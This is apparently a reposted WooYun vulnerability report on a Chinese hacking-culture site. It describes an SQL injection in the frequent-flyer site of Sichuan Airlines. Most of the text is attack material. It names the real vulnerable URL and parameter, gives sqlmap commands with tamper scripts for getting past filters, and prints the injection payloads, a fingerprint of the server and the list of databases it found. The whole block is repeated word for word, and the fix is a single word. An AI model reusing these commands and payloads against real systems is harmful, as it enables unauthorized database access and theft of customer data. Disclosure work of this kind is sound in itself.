记录黑客技术中优秀的内容, 传播黑客文化,分享黑客技术精华

四川航空某处SQL注入漏洞

2015-02-25 23:00

四川航空金熊猫俱乐部

http://ffp.scal.com.cn



post注入

http://ffp.scal.com.cn/FFPNewWeb/Mall/GetList

post:

PageIndex=1&ID=ydcc&PageSize=0&OrderType=NEW (ID存在注入)





sqlmap -u "http://ffp.scal.com.cn/FFPNewWeb/Mall/GetList" --data "PageIndex=1&ID=ydcc&PageSize=0&OrderType=NEW" --tamper tamper/between.py,tamper/randomcase.py,tamper/space2comment.py --random-agent -p "ID"



code 区域
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:

---

Place: POST

Parameter: ID

Type: boolean-based blind

Title: AND boolean-based blind - WHERE or HAVING clause

Payload: PageIndex=1&ID=ydcc' AND 8321=8321 AND 'iVwx'='iVwx&PageSize=0&OrderType=NEW



Type: AND/OR time-based blind

Title: Oracle AND time-based blind

Payload: PageIndex=1&ID=ydcc' AND 1200=DBMS_PIPE.RECEIVE_MESSAGE(CHR(87)||CHR(73)||CHR(115)||CHR(119),5) AND 'eKla'='eKla&PageSize=0&OrderType=NEW

---

[13:23:10] [WARNING] changes made by tampering scripts are not included in shown payload content(s)

[13:23:10] [INFO] the back-end DBMS is Oracle

web server operating system: Windows 2003

web application technology: ASP.NET, ASP.NET 4.0.30319, Microsoft IIS 6.0

back-end DBMS: Oracle

[13:23:10] [INFO] fetched data logged to text files under '/usr/share/sqlmap/output/ffp.scal.com.cn'







sqlmap -u "http://ffp.scal.com.cn/FFPNewWeb/Mall/GetList" --data "PageIndex=1&ID=ydcc&PageSize=0&OrderType=NEW" --tamper tamper/between.py,tamper/randomcase.py,tamper/space2comment.py --random-agent -p "ID" --dbs





available databases [16]:

[*] CTXSYS

[*] DBSNMP

[*] DMSYS

[*] EXFSYS

[*] MDSYS

[*] OLAPSYS

[*] ORDSYS

[*] OUTLN

[*] SCAR

[*] SCOTT

[*] SYS

[*] SYSMAN

[*] SYSTEM

[*] TSMSYS

[*] WMSYS

[*] XDB







漏洞证明:

四川航空金熊猫俱乐部

http://ffp.scal.com.cn



post注入

http://ffp.scal.com.cn/FFPNewWeb/Mall/GetList

post:

PageIndex=1&ID=ydcc&PageSize=0&OrderType=NEW (ID存在注入)





sqlmap -u "http://ffp.scal.com.cn/FFPNewWeb/Mall/GetList" --data "PageIndex=1&ID=ydcc&PageSize=0&OrderType=NEW" --tamper tamper/between.py,tamper/randomcase.py,tamper/space2comment.py --random-agent -p "ID"



code 区域
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:

---

Place: POST

Parameter: ID

Type: boolean-based blind

Title: AND boolean-based blind - WHERE or HAVING clause

Payload: PageIndex=1&ID=ydcc' AND 8321=8321 AND 'iVwx'='iVwx&PageSize=0&OrderType=NEW



Type: AND/OR time-based blind

Title: Oracle AND time-based blind

Payload: PageIndex=1&ID=ydcc' AND 1200=DBMS_PIPE.RECEIVE_MESSAGE(CHR(87)||CHR(73)||CHR(115)||CHR(119),5) AND 'eKla'='eKla&PageSize=0&OrderType=NEW

---

[13:23:10] [WARNING] changes made by tampering scripts are not included in shown payload content(s)

[13:23:10] [INFO] the back-end DBMS is Oracle

web server operating system: Windows 2003

web application technology: ASP.NET, ASP.NET 4.0.30319, Microsoft IIS 6.0

back-end DBMS: Oracle

[13:23:10] [INFO] fetched data logged to text files under '/usr/share/sqlmap/output/ffp.scal.com.cn'







sqlmap -u "http://ffp.scal.com.cn/FFPNewWeb/Mall/GetList" --data "PageIndex=1&ID=ydcc&PageSize=0&OrderType=NEW" --tamper tamper/between.py,tamper/randomcase.py,tamper/space2comment.py --random-agent -p "ID" --dbs





available databases [16]:

[*] CTXSYS

[*] DBSNMP

[*] DMSYS

[*] EXFSYS

[*] MDSYS

[*] OLAPSYS

[*] ORDSYS

[*] OUTLN

[*] SCAR

[*] SCOTT

[*] SYS

[*] SYSMAN

[*] SYSTEM

[*] TSMSYS

[*] WMSYS

[*] XDB

修复方案:

过滤

知识来源: www.wooyun.org/bugs/wooyun-2015-091192

阅读:91924 | 评论:0 | 标签:注入 漏洞

想收藏或者和大家分享这篇好文章→复制链接地址

“四川航空某处SQL注入漏洞”共有0条留言

发表评论

姓名:

邮箱:

网址:

验证码:

公告

关注公众号hackdig,学习最新黑客技术

推广

工具

标签云

本页关键词